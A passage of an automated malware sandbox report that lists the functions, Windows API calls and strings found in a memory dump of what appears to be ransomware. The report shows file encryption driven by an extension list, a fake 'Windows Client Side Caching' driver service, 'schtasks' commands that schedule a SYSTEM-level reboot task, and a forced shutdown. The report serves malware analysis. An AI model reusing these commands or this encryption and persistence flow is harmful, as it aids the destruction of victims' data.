L^G, xrefs: 00475BE9, 00475C57, 00475C7F, 00475CBD

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00471EB9, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 161

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,0047943A), ref: 00471ED2
HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 00471EDB
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0047943A), ref: 00471F1F
HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 00471F22
htons.WS2_32(?), ref: 00471F41
send.WS2_32(?,00000000,?,00000000), ref: 00471FF1
recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 00472008
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0047943A), ref: 0047202B
HeapFree.KERNEL32(00000000), ref: 00472032
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0047943A), ref: 0047203D
HeapFree.KERNEL32(00000000), ref: 00472044

Strings

?????, xrefs: 00471FDF

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00475A73, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 132

APIs

GetSystemInfo.KERNELBASE(?,00000000,?,?,?,?,?,?,00475DE8,00000000,?,?,?,00000010,?), ref: 00475A92
__alldiv.INT64 ref: 00475AC3
MapViewOfFile.KERNELBASE(00000010,00000004,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475AEA
CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475B32
CryptHashData.ADVAPI32(00000010,00000010,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475B49
LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475B5F
CryptGetHashParam.ADVAPI32(00000010,00000002,00000000,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475B77
LocalFree.KERNEL32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475B99
CryptDestroyHash.ADVAPI32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475BA2
UnmapViewOfFile.KERNEL32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475BB4

Strings

encrypted, xrefs: 00475B08
]G, xrefs: 00475B90

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00475D0A, Relevance: 19.7, APIs: 13, Instructions: 152

APIs

CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000), ref: 00475D2A
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00475D46
GetFileSizeEx.KERNEL32(00000000,?), ref: 00475D60
__alldiv.INT64 ref: 00475D8D
CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,?,00000000), ref: 00475DBC
CloseHandle.KERNEL32(?), ref: 00475E71

Part of subcall function 00475A73: GetSystemInfo.KERNELBASE(?,00000000,?,?,?,?,?,?,00475DE8,00000000,?,?,?,00000010,?), ref: 00475A92
Part of subcall function 00475A73: __alldiv.INT64 ref: 00475AC3
Part of subcall function 00475A73: MapViewOfFile.KERNELBASE(00000010,00000004,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475AEA
Part of subcall function 00475A73: CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475B32
Part of subcall function 00475A73: CryptHashData.ADVAPI32(00000010,00000010,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475B49
Part of subcall function 00475A73: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475B5F
Part of subcall function 00475A73: CryptDestroyHash.ADVAPI32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475BA2
Part of subcall function 00475A73: UnmapViewOfFile.KERNEL32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475BB4

MapViewOfFile.KERNELBASE(?,00000006,00000000,00000000,?,00000000,?,?,?,00000010,?), ref: 00475DFD
CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,?), ref: 00475E1A
FlushViewOfFile.KERNEL32(?,?), ref: 00475E2C
UnmapViewOfFile.KERNEL32(?), ref: 00475E35

Part of subcall function 00475BC4: GetSystemInfo.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,?,?,?,00475E4C,?,?,00000000), ref: 00475BE3
Part of subcall function 00475BC4: __alldiv.INT64 ref: 00475C14
Part of subcall function 00475BC4: MapViewOfFile.KERNELBASE(00000000,00000006,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475C39
Part of subcall function 00475BC4: CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475C5D
Part of subcall function 00475BC4: CryptHashData.ADVAPI32(00000000,00000000,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475C75
Part of subcall function 00475BC4: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475C8B
Part of subcall function 00475BC4: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475CA4
Part of subcall function 00475BC4: memcpy.MSVCRT ref: 00475CB8
Part of subcall function 00475BC4: LocalFree.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475CE8
Part of subcall function 00475BC4: CryptDestroyHash.ADVAPI32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475CF1
Part of subcall function 00475BC4: UnmapViewOfFile.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475CFA

CloseHandle.KERNEL32(?), ref: 00475E54

Part of subcall function 00475A11: GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?), ref: 00475A29
Part of subcall function 00475A11: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00475A56
Part of subcall function 00475A11: SetEndOfFile.KERNEL32(?), ref: 00475A63

CryptDestroyKey.ADVAPI32(?), ref: 00475E7F
SetEvent.KERNEL32(?), ref: 00475E92

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00478313, Relevance: 19.6, APIs: 13, Instructions: 99

APIs

FindResourceW.KERNEL32(?,00000006,00000000), ref: 0047832A
LoadResource.KERNEL32(00000000), ref: 00478341
LockResource.KERNEL32(00000000), ref: 00478350
SizeofResource.KERNEL32(00000000), ref: 00478368
GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00478384
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0047838D
memcpy.MSVCRT ref: 0047839C
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 004783B9
RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 004783BC
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 004783FE
HeapFree.KERNEL32(00000000), ref: 00478401
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0047840A
HeapFree.KERNEL32(00000000), ref: 0047840D

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00471368, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 51

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,?,cscc,?,0047154F,00000000,004711D0,?,?,?), ref: 00471377
GetLastError.KERNEL32(?,0047154F,00000000,004711D0,?,?,?), ref: 00471383
CreateServiceW.SECHOST(00000000,cscc,Windows Client Side Caching DDriver,000F01FF,00000001,00000000,00000003,cscc.dat,Filter,00000000,FltMgr,00000000,00000000,?,?,0047154F), ref: 004713B6
GetLastError.KERNEL32(?,?,0047154F,00000000,004711D0,?,?,?), ref: 004713C7
CloseServiceHandle.ADVAPI32(00000000,?,?,0047154F,00000000,004711D0,?,?,?), ref: 004713DB
CloseServiceHandle.ADVAPI32(00000000,?,?,0047154F,00000000,004711D0,?,?,?), ref: 004713DE

Strings

FltMgr, xrefs: 00471391
cscc, xrefs: 0047136B, 004713B0
Windows Client Side Caching DDriver, xrefs: 004713AB
cscc.dat, xrefs: 0047139C
Filter, xrefs: 00471397

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00471531, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 36

APIs

Part of subcall function 00471368: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,?,cscc,?,0047154F,00000000,004711D0,?,?,?), ref: 00471377
Part of subcall function 00471368: GetLastError.KERNEL32(?,0047154F,00000000,004711D0,?,?,?), ref: 00471383
Part of subcall function 00471368: CreateServiceW.SECHOST(00000000,cscc,Windows Client Side Caching DDriver,000F01FF,00000001,00000000,00000003,cscc.dat,Filter,00000000,FltMgr,00000000,00000000,?,?,0047154F), ref: 004713B6
Part of subcall function 00471368: GetLastError.KERNEL32(?,?,0047154F,00000000,004711D0,?,?,?), ref: 004713C7
Part of subcall function 00471368: CloseServiceHandle.ADVAPI32(00000000,?,?,0047154F,00000000,004711D0,?,?,?), ref: 004713DB
Part of subcall function 00471368: CloseServiceHandle.ADVAPI32(00000000,?,?,0047154F,00000000,004711D0,?,?,?), ref: 004713DE

GetVersion.KERNEL32(SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318},UpperFilters,SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F},LowerFilters,00000000,004711D0,?,?,?), ref: 00471588

Part of subcall function 004713E8: wsprintfW.USER32 ref: 00471408
Part of subcall function 004713E8: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 00471427
Part of subcall function 004713E8: RegQueryValueExW.ADVAPI32(?,Start,00000000,00000000,?,?,?,00000000), ref: 00471453
Part of subcall function 004713E8: RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 0047147E
Part of subcall function 004713E8: RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 00471495
Part of subcall function 004713E8: RegSetValueExW.ADVAPI32(?,Group,00000000,00000001,Filter,0000000E,?,00000000), ref: 004714B3
Part of subcall function 004713E8: RegSetValueExW.ADVAPI32(?,DependOnService,00000000,00000007,FltMgr,0000000E,?,00000000), ref: 004714CB
Part of subcall function 004713E8: RegSetValueExW.ADVAPI32(?,ErrorControl,00000000,00000004,?,00000004,?,00000000), ref: 004714E9
Part of subcall function 004713E8: RegCloseKey.ADVAPI32(?,?,00000000), ref: 00471523

Part of subcall function 004711EF: RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00471204
Part of subcall function 004711EF: RegQueryValueExW.KERNEL32(00000800,?,00000000,?,?,?,00000000,?), ref: 0047124F
Part of subcall function 004711EF: memmove.MSVCRT ref: 00471302
Part of subcall function 004711EF: memcpy.MSVCRT ref: 00471315
Part of subcall function 004711EF: RegSetValueExW.KERNEL32(00000800,00000007,00000000,00000007,?,00000800), ref: 00471334
Part of subcall function 004711EF: RegFlushKey.ADVAPI32(00000800), ref: 00471344
Part of subcall function 004711EF: RegCloseKey.ADVAPI32(00000800), ref: 00471359

Strings

cscc, xrefs: 00471533
UpperFilters, xrefs: 00471573
cscc, xrefs: 0047153A
DumpFilters, xrefs: 00471592
LowerFilters, xrefs: 0047155E
SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}, xrefs: 00471563
SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}, xrefs: 00471578
SYSTEM\CurrentControlSet\Control\CrashControl, xrefs: 00471597

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476299, Relevance: 15.1, APIs: 10, Instructions: 81

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 004762A5
LocalFree.KERNEL32(?), ref: 0047635D

Part of subcall function 00475507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,004762C3,?), ref: 00475520
Part of subcall function 00475507: GetLastError.KERNEL32(?,004762C3,?), ref: 00475528
Part of subcall function 00475507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,004762C3,?), ref: 0047553E

CloseHandle.KERNEL32(?), ref: 00476348

Part of subcall function 00475613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00475636
Part of subcall function 00475613: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 0047564C
Part of subcall function 00475613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00475662
Part of subcall function 00475613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 00475682
Part of subcall function 00475613: LocalAlloc.KERNEL32(00000040,?), ref: 0047568D
Part of subcall function 00475613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 004756A6
Part of subcall function 00475613: CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 004756B5
Part of subcall function 00475613: LocalFree.KERNEL32(00000000), ref: 004756BF
Part of subcall function 00475613: LocalFree.KERNEL32(?), ref: 004756C8

CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?), ref: 0047633F

Part of subcall function 00476085: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,004762E0,?,?,?,?), ref: 004760A6
Part of subcall function 00476085: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,004762E0,?,?,?,?), ref: 004760BA
Part of subcall function 00476085: CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,004762E0,?,?,?,?), ref: 004760D3
Part of subcall function 00476085: CryptDestroyHash.ADVAPI32(?,?,?,?,004762E0,?,?,?,?), ref: 004760DF

CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 00476336

Part of subcall function 00476246: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,004762E9,?,?,?,?), ref: 00476260
Part of subcall function 00476246: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,004762E9,?,?,?,?), ref: 00476273
Part of subcall function 00476246: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,004762E9,?,?,?,?), ref: 00476289

CreateThread.KERNEL32(00000000,00000000,Function_000060F9,?,00000000,00000000), ref: 004762F7

Part of subcall function 00475E9F: PathCombineW.SHLWAPI(?,?,00481554), ref: 00475EC8
Part of subcall function 00475E9F: FindFirstFileW.KERNELBASE(?,?), ref: 00475EE3
Part of subcall function 00475E9F: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 00475F09
Part of subcall function 00475E9F: PathCombineW.SHLWAPI(?,?,?), ref: 00475FB1
Part of subcall function 00475E9F: StrStrIW.SHLWAPI(?,00483014), ref: 00475FE9
Part of subcall function 00475E9F: PathFindExtensionW.SHLWAPI(?), ref: 0047601B
Part of subcall function 00475E9F: FindNextFileW.KERNELBASE(?,?), ref: 00476065
Part of subcall function 00475E9F: FindClose.KERNEL32(?), ref: 00476077

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00476312
CloseHandle.KERNEL32(00000000), ref: 00476319
CryptDestroyHash.ADVAPI32(?,?,00000011,?), ref: 00476322
CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 0047632D

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00475613, Relevance: 13.6, APIs: 9, Instructions: 87

APIs

CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00475636
LocalAlloc.KERNEL32(00000040,?,00000000), ref: 0047564C
CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00475662
CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 00475682
LocalAlloc.KERNEL32(00000040,?), ref: 0047568D
CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 004756A6
CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 004756B5
LocalFree.KERNEL32(00000000), ref: 004756BF
LocalFree.KERNEL32(?), ref: 004756C8

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00475E9F, Relevance: 12.2, APIs: 8, Instructions: 151

APIs

PathCombineW.SHLWAPI(?,?,00481554), ref: 00475EC8
FindFirstFileW.KERNELBASE(?,?), ref: 00475EE3
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 00475F09
PathCombineW.SHLWAPI(?,?,?), ref: 00475FB1

Part of subcall function 00475E9F: StrStrIW.SHLWAPI(?,00483014), ref: 00475FE9

PathFindExtensionW.SHLWAPI(?), ref: 0047601B

Part of subcall function 00475D0A: CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000), ref: 00475D2A
Part of subcall function 00475D0A: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00475D46
Part of subcall function 00475D0A: GetFileSizeEx.KERNEL32(00000000,?), ref: 00475D60
Part of subcall function 00475D0A: __alldiv.INT64 ref: 00475D8D
Part of subcall function 00475D0A: CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,?,00000000), ref: 00475DBC
Part of subcall function 00475D0A: MapViewOfFile.KERNELBASE(?,00000006,00000000,00000000,?,00000000,?,?,?,00000010,?), ref: 00475DFD
Part of subcall function 00475D0A: CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,?), ref: 00475E1A
Part of subcall function 00475D0A: FlushViewOfFile.KERNEL32(?,?), ref: 00475E2C
Part of subcall function 00475D0A: UnmapViewOfFile.KERNEL32(?), ref: 00475E35
Part of subcall function 00475D0A: CloseHandle.KERNEL32(?), ref: 00475E54
Part of subcall function 00475D0A: CloseHandle.KERNEL32(?), ref: 00475E71
Part of subcall function 00475D0A: CryptDestroyKey.ADVAPI32(?), ref: 00475E7F
Part of subcall function 00475D0A: SetEvent.KERNEL32(?), ref: 00475E92

Part of subcall function 004759B1: StrStrIW.SHLWAPI(.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.em,?), ref: 004759FD

FindNextFileW.KERNELBASE(?,?), ref: 00476065
FindClose.KERNEL32(?), ref: 00476077

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00478192, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133

APIs

GetLocalTime.KERNEL32(?,00000000), ref: 004781AF

Part of subcall function 00476477: GetTickCount.KERNEL32(00477DDC,?,?,00000000,?,?,00477AA3,?,?,000000FF,?,?), ref: 00476477

GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 004781F2
PathAppendW.SHLWAPI(?,?), ref: 004782AF
wsprintfW.USER32 ref: 004782CE

Part of subcall function 00477FB7: wsprintfW.USER32 ref: 00477FD6
Part of subcall function 00477FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 00477FFA
Part of subcall function 00477FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0047800C
Part of subcall function 00477FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00478022
Part of subcall function 00477FB7: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00478069
Part of subcall function 00477FB7: Sleep.KERNELBASE(00000000), ref: 0047807F

Strings

schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00, xrefs: 004782C8

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00478A23, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24

APIs

Part of subcall function 0047808E: wsprintfW.USER32 ref: 004780BC
Part of subcall function 0047808E: wsprintfW.USER32 ref: 004780CC
Part of subcall function 0047808E: wsprintfW.USER32 ref: 004780DC
Part of subcall function 0047808E: wsprintfW.USER32 ref: 004780EC
Part of subcall function 0047808E: wsprintfW.USER32 ref: 00478126

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 00478A54
ExitWindowsEx.USER32(00000006,00000000), ref: 00478A61
ExitProcess.KERNEL32 ref: 00478A68

Part of subcall function 00477FB7: wsprintfW.USER32 ref: 00477FD6
Part of subcall function 00477FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 00477FFA
Part of subcall function 00477FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0047800C
Part of subcall function 00477FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00478022
Part of subcall function 00477FB7: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00478069
Part of subcall function 00477FB7: Sleep.KERNELBASE(00000000), ref: 0047807F

Strings

schtasks /Delete /F /TN drogon, xrefs: 00478A35

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00479016, Relevance: 6.1, APIs: 4, Instructions: 109

APIs

VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 00479090
LoadLibraryA.KERNEL32(?), ref: 004790BA
GetProcAddress.KERNEL32(00000000,00470000), ref: 004790FD
VirtualProtect.KERNELBASE(?,?,?,?), ref: 0047913D

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004784EE, Relevance: 6.0, APIs: 4, Instructions: 35

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004784FC
Process32FirstW.KERNEL32(00000000,?), ref: 0047851B
Process32NextW.KERNEL32(00000000,0000022C), ref: 0047853E

Part of subcall function 0047841D: GetCurrentProcessId.KERNEL32(?,00478555,?,?), ref: 00478430
Part of subcall function 0047841D: OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,00478555,?,?), ref: 0047844C
Part of subcall function 0047841D: OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,00478555,?,?), ref: 00478464
Part of subcall function 0047841D: DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,00478555,?,?), ref: 0047847D
Part of subcall function 0047841D: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004784A3
Part of subcall function 0047841D: CheckTokenMembership.ADVAPI32(?,?,?), ref: 004784BA
Part of subcall function 0047841D: TerminateProcess.KERNEL32(00000000,00000000), ref: 004784CB
Part of subcall function 0047841D: FreeSid.ADVAPI32(?), ref: 004784D4
Part of subcall function 0047841D: CloseHandle.KERNEL32(?), ref: 004784DD
Part of subcall function 0047841D: CloseHandle.KERNEL32(?), ref: 004784E2
Part of subcall function 0047841D: CloseHandle.KERNEL32(00000000), ref: 004784E5

CloseHandle.KERNEL32(00000000), ref: 00478556

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047554A, Relevance: 6.0, APIs: 4, Instructions: 30

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 00475561
GetLastError.KERNEL32(?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,004779E8), ref: 0047556B
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,004779E8), ref: 00475581
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,004779E8), ref: 0047558E

